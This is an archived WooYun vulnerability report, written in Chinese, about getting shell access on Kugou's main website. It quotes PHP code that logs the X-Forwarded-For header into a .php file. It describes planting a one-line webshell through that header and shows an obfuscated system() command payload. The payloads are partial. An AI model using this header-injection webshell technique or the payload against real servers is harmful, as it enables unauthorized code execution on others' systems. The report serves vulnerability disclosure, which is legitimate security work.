当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168825

漏洞标题:昨夜酷狗主站可Getshell(修复速度太快了)

相关厂商:酷狗

漏洞作者: getshell1993

提交时间:2016-01-10 11:47

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-10: 细节已通知厂商并且等待厂商处理中
2016-01-10: 厂商已经确认,细节仅向厂商公开
2016-01-20: 细节向核心白帽子及相关领域专家公开
2016-01-30: 细节向普通白帽子公开
2016-02-09: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

睡了个觉,起床发现漏洞补了,大周末的,要不要这么快!!!!!

详细说明:

问题在于1月8号晚
发现酷狗主站存在备份文件
http://www.kugou.com/www.kugou.com.tar.gz

1.png


下回来一看发现是主站的旧备份

2.png


本来准备先提交的,不过发现过了一会居然备份被删了。
9号发现一处可直接getshell
errorPage/pc_errorhelp.php
errorPage/pc_errorhelp2.php

3.png


$preg = '/Windows NT (\d)/U';
@preg_match($preg,$_SERVER['HTTP_USER_AGENT'],$match);
$win = empty($match[1])?5:(int)$match[1];
$isFirstTime = empty($_COOKIE['IEor']);
@setcookie("IEor", 1, time()+3600*24,'/','.kugou.com');//写cookie备用检查是否正常
$log = date('Y-m-d H:i:s')."\t".MygetIP()."\t".$ver."\t".$win."\t".($isFirstTime?"First":"NotF").PHP_EOL;
@file_put_contents('help_log.php',$log,FILE_APPEND);
function MygetIP(){
$realIP = FALSE;
if(!empty($_SERVER['HTTP_CLIENT_IP'])){
$realIP = $_SERVER['HTTP_CLIENT_IP'];
}
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ips = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
foreach($ips as $ip){
$ip = trim($ip);
if(!isLAN($ip)){ //非局域网
$realIP = $ip;
break;
}
}
}

4.png


X-Forwarded-For 加上一句话

4.jpg


访问http://www.kugou.com/errorPage/help_log.php(超级卡)

1.png


搜99999 存在证明成功了

2.png


漏洞证明:

5.png


也可以执行命令
x=system(chr(108).chr(115).chr(32).chr(45).chr(108).chr(97));

6.jpg


搞到这困得不行,已经凌晨快一点了,睡了个觉,起床发现漏洞补了,没想到修复速度快得惊人啊。

7.png


附送一个SVN泄露
fyb.kugou.com

1.png

修复方案:

备份别再放根目录啦~

版权声明:转载请注明来源 getshell1993@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-10 12:06

厂商回复:

谢谢提交!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-01-10 11:48 | Yuku ( 路人 | Rank:22 漏洞数:20 | 数据挖掘)

    主站可Getshell,牛逼!

  2. 2016-01-10 11:51 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河 为你放弃世界有何不可)

    shell 嘿嘿

  3. 2016-01-10 12:11 | getshell1993 认证白帽子 ( 普通白帽子 | Rank:865 漏洞数:96 | ~!@#¥%……&*)

    是否接受并发送联系方式给此厂商? 接受 额,礼物就不要了,太多要联系方式不发礼物的厂商了!!

  4. 2016-01-10 12:26 | Yuku ( 路人 | Rank:22 漏洞数:20 | 数据挖掘)

    @getshell1993 太高冷了

  5. 2016-01-10 12:33 | whynot ( 普通白帽子 | Rank:553 漏洞数:100 | 为你解冻冰河 为你放弃世界有何不可)

    @getshell1993 都是职业查水表

  6. 2016-01-10 12:49 | scanf ( 核心白帽子 | Rank:1399 漏洞数:200 | 。)

    可怕

  7. 2016-01-10 12:52 | 小龙 ( 普通白帽子 | Rank:1446 漏洞数:371 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @getshell1993 主站shell,他估计是怕你脱库之类的了,然后先要你联系方式。。。

  8. 2016-01-10 13:29 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    主站shell!!!666

  9. 2016-01-10 15:57 | lanyan ( 路人 | Rank:1 漏洞数:1 | 啦啦啦啦啦 k哥成功和我混)

    @getshell1993 白帽砸 挖个洞 还查水表!?? 我新来的啥都不知道

  10. 2016-01-10 16:01 | getshell1993 认证白帽子 ( 普通白帽子 | Rank:865 漏洞数:96 | ~!@#¥%……&*)

    @lanyan 楼上理解错了 我是说现在很多厂商要联系方式送礼物但没送的问题

  11. 2016-01-10 16:24 | lanyan ( 路人 | Rank:1 漏洞数:1 | 啦啦啦啦啦 k哥成功和我混)

    @getshell1993 噢噢好吧好吧 不过我听说也有抓的 是真滴嘛。

  12. 2016-01-10 20:26 | ’‘Nome ( 实习白帽子 | Rank:73 漏洞数:22 | 有事请发邮件,2859857@gmail.com,垃圾邮...)

    呵呵主站getshell给5分真…就这样胡乱的打分了?@疯狗?

  13. 2016-01-10 21:37 | 不能忍 ( 实习白帽子 | Rank:80 漏洞数:41 | 要是能重来,我要选李白!)

    腻害啊

  14. 2016-01-10 22:44 | 牛奶鸡蛋 ( 路人 | Rank:8 漏洞数:2 | 日战好难,有偿拜师)

    还我快播

  15. 2016-01-11 08:29 | 暴走 ( 普通白帽子 | Rank:477 漏洞数:92 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    @牛奶鸡蛋 快播GG了